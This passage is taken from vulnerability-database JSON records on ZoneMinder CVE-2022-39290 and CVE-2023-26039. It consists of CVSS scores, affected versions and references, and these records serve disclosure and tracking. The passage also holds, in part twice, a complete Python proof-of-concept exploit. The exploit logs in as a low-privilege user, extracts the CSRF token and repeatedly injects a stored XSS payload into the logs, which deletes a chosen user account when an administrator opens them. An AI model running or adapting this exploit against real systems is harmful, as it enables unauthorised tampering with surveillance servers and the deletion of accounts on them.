username and password is correct.") sys.exit(1) print("Collected the low privilege user session token: "+finalSession)
Request using response headers to obtain CSRF value
csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter" csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'} csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58¤t=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"} response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies) zmBody = response.text extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody)) finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '') print("Collected the CSRF key for the log injection request: "+finalCsrfKey) print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log")
while True:
#XSS Request
xssUrl = "http://"+options.ip+"/zm/index.php"
xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession}
xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"}
xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"}
response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)
print("Injecting payload: " + response.text)
time.sleep(1)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202210-0233",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.36.27"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.24"
},
{
"model": "zoneminder",
"scope": "gt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.0"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.37.0 greater than 1.37.24"
},
{
"model": "zoneminder",
"scope": null,
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.36.27"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Trenches Of IT",
"sources": [
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 0.1
},
"cve": "CVE-2022-39290",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"id": "CVE-2022-39290",
"impactScore": 3.6,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "security-advisories@github.com",
"availabilityImpact": "HIGH",
"baseScore": 8.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.1,
"id": "CVE-2022-39290",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2022-39290",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2022-39290",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "security-advisories@github.com",
"id": "CVE-2022-39290",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2022-39290",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-202210-331",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder is a free, open source Closed-circuit television software application. In affected versions authenticated users can bypass CSRF keys by modifying the request supplied to the Zoneminder web application. These modifications include replacing HTTP POST with an HTTP GET and removing the CSRF key from the request. An attacker can take advantage of this by using an HTTP GET request to perform actions with no CSRF protection. This could allow an attacker to cause an authenticated user to perform unexpected actions on the web application. Users are advised to upgrade as soon as possible. There are no known workarounds for this issue. ZoneMinder There is an authentication vulnerability in.Information may be tampered with. # Exploit Title: Zoneminder v1.36.26 - Log Injection -\u003e CSRF Bypass -\u003e Stored Cross-Site Scripting (XSS)\n# Date: 10/01/2022\n# Exploit Author: Trenches of IT\n# Vendor Homepage: https://github.com/ZoneMinder/zoneminder\n# Version: v1.36.26\n# Tested on: Linux/Windows\n# CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 \n# Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/\n#\n# Proof of Concept:\n# 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped)\n# 2 - Admin user logs navigates to http://\u003ctarget\u003e/zm/index.php?view=log\n# 3 - XSS executes delete function on target UID (user). \n\nimport requests\nimport re\nimport time\nimport argparse\nimport sys\n\ndef getOptions(args=sys.argv[1:]):\n parser = argparse.ArgumentParser(description=\"Trenches of IT Zoneminder Exploit PoC\", epilog=\"Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1\")\n parser.add_argument(\"-i\", \"--ip\", help=\"Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4\", required=True)\n parser.add_argument(\"-p\", \"--port\", help=\"Provide the port of the target zoneminder server. (Example: -p 80\", required=True)\n parser.add_argument(\"-zU\", \"--username\", help=\"Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv\", required=True)\n parser.add_argument(\"-zP\", \"--password\", help=\"Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv\", required=True)\n parser.add_argument(\"-d\", \"--deleteUser\", help=\"Provide the target user UID to delete from the target zoneminder server. (Example: -d 7\", required=True)\n options = parser.parse_args(args)\n return options\n\noptions = getOptions(sys.argv[1:])\n\npayload = \"http%3A%2F%2F\" + options.ip + \"%2Fzm%2F\u003c/td\u003e\u003c/tr\u003e\u003cscript src=\u0027/zm/index.php?view=options\u0026tab=users\u0026action=delete\u0026markUids[]=\" + options.deleteUser + \"\u0026deleteBtn=Delete\u0027\u003c/script\u003e\"\n\n#Request to login and get the response headers\nloginUrl = \"http://\" + options.ip + \":\" + options.port + \"/zm/index.php?action=login\u0026view=login\u0026username=\"+options.username+\"\u0026password=\"+options.password\nloginCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \"f1neru6bq6bfddl7snpjqo6ss2\"}\nloginHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=login\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies)\nzmHeaders = response.headers\ntry:\n zoneminderSession = re.findall(r\u0027ZMSESSID\\=\\w+\\;\u0027, str(zmHeaders))\n finalSession = zoneminderSession[-1].replace(\u0027ZMSESSID=\u0027, \u0027\u0027).strip(\u0027;\u0027)\nexcept:\n print(\"[ERROR] Ensure the provided username and password is correct.\")\n sys.exit(1)\nprint(\"Collected the low privilege user session token: \"+finalSession)\n\n#Request using response headers to obtain CSRF value\ncsrfUrl = \"http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\"\ncsrfCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": \u0027\"\u0027 + finalSession + \u0027\"\u0027}\ncsrfHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026minTime=2022-09-30T20:52:58\u0026maxTime=2022-09-30T21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\", \"Upgrade-Insecure-Requests\": \"1\"}\nresponse = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies)\nzmBody = response.text\nextractedCsrfKey = re.findall(r\u0027csrfMagicToken\\s\\=\\s\\\"key\\:\\w+\\,\\d+\u0027, str(zmBody))\nfinalCsrfKey = extractedCsrfKey[0].replace(\u0027csrfMagicToken = \"\u0027, \u0027\u0027)\nprint(\"Collected the CSRF key for the log injection request: \"+finalCsrfKey)\nprint(\"Navigate here with an admin user: http://\"+options.ip+\"/zm/index.php?view=log\")\n\nwhile True:\n \n #XSS Request\n xssUrl = \"http://\"+options.ip+\"/zm/index.php\"\n xssCookies = {\"zmSkin\": \"classic\", \"zmCSS\": \"base\", \"zmLogsTable.bs.table.pageNumber\": \"1\", \"zmEventsTable.bs.table.columns\": \"%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D\", \"zmEventsTable.bs.table.searchText\": \"\", \"zmEventsTable.bs.table.pageNumber\": \"1\", \"zmBandwidth\": \"high\", \"zmHeaderFlip\": \"up\", \"ZMSESSID\": finalSession}\n xssHeaders = {\"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\", \"Accept\": \"application/json, text/javascript, */*; q=0.01\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"X-Requested-With\": \"XMLHttpRequest\", \"Origin\": \"http://\"+options.ip, \"Connection\": \"close\", \"Referer\": \"http://\"+options.ip+\"/zm/index.php?view=filter\"}\n xssData = {\"__csrf_magic\": finalCsrfKey , \"view\": \"request\", \"request\": \"log\", \"task\": \"create\", \"level\": \"ERR\", \"message\": \"Trenches%20of%20IT%20PoC\", \"browser[name]\": \"Firefox\", \"browser[version]\": \"91.0\", \"browser[platform]\": \"UNIX\", \"file\": payload, \"line\": \"105\"} \n response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData)\n print(\"Injecting payload: \" + response.text)\n\n time.sleep(1)\n \n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-39290"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "PACKETSTORM",
"id": "171498"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-39290",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "171498",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331",
"trust": 0.6
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"id": "VAR-202210-0233",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
}
],
"trust": 0.01
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"home \u0026 office device"
],
"sub_category": "TV",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
}
]
},
"last_update_date": "2025-01-30T21:11:14.974000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "ZoneMinder Remediation measures for authorization problem vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=210329"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.0
},
{
"problemtype": "Inappropriate authentication (CWE-287) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/171498/zoneminder-log-injection-xss-cross-site-request-forgery.html"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/commit/c0a4c05e84eea0f6ccf7169c014efe5422c9ba0d"
},
{
"trust": 2.4,
"url": "https://github.com/zoneminder/zoneminder/security/advisories/ghsa-xgv6-qv6c-399q"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39290"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2022-39290/"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=log\")"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=montagereview\u0026fit=1\u0026mintime=2022-09-30t20:52:58\u0026maxtime=2022-09-30t21:22:58\u0026current=2022-09-30%2021:07:58\u0026displayinterval=1000\u0026live=0\u0026scale=1\u0026speed=1\","
},
{
"trust": 0.1,
"url": "https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39285"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=login\","
},
{
"trust": 0.1,
"url": "https://github.com/zoneminder/zoneminder"
},
{
"trust": 0.1,
"url": "http://\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\"/zm/index.php?view=filter\"}"
},
{
"trust": 0.1,
"url": "http://\"+options.ip+\":\"+options.port+\"/zm/index.php?view=filter\""
},
{
"trust": 0.1,
"url": "http://\"+options.ip,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-39291"
},
{
"trust": 0.1,
"url": "http://\u003ctarget\u003e/zm/index.php?view=log"
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "OTHER",
"id": null
},
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"db": "PACKETSTORM",
"id": "171498"
},
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"date": "2023-03-27T14:54:04",
"db": "PACKETSTORM",
"id": "171498"
},
{
"date": "2022-10-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"date": "2022-10-07T21:15:11.673000",
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-10-20T08:27:00",
"db": "JVNDB",
"id": "JVNDB-2022-018648"
},
{
"date": "2023-03-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202210-331"
},
{
"date": "2023-03-27T18:15:11.687000",
"db": "NVD",
"id": "CVE-2022-39290"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ZoneMinder\u00a0 Authentication vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-018648"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202210-331"
}
],
"trust": 0.6
}
}
VAR-202302-1970
Vulnerability from variot - Updated: 2025-01-30 20:59ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 contain an OS Command Injection via daemonControl() in (/web/api/app/Controller/HostController.php). Any authenticated user can construct an api command to execute any shell command as the web user. This issue is patched in versions 1.36.33 and 1.37.33. ZoneMinder for, OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202302-1970",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "zoneminder",
"scope": "gte",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.00"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.36.33"
},
{
"model": "zoneminder",
"scope": "lt",
"trust": 1.0,
"vendor": "zoneminder",
"version": "1.37.33"
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.36.33"
},
{
"model": "zoneminder",
"scope": null,
"trust": 0.8,
"vendor": "zoneminder",
"version": null
},
{
"model": "zoneminder",
"scope": "eq",
"trust": 0.8,
"vendor": "zoneminder",
"version": "1.37.00 that\u0027s all 1.37.33"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-004661"
},
{
"db": "NVD",
"id": "CVE-2023-26039"
}
]
},
"cve": "CVE-2023-26039",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
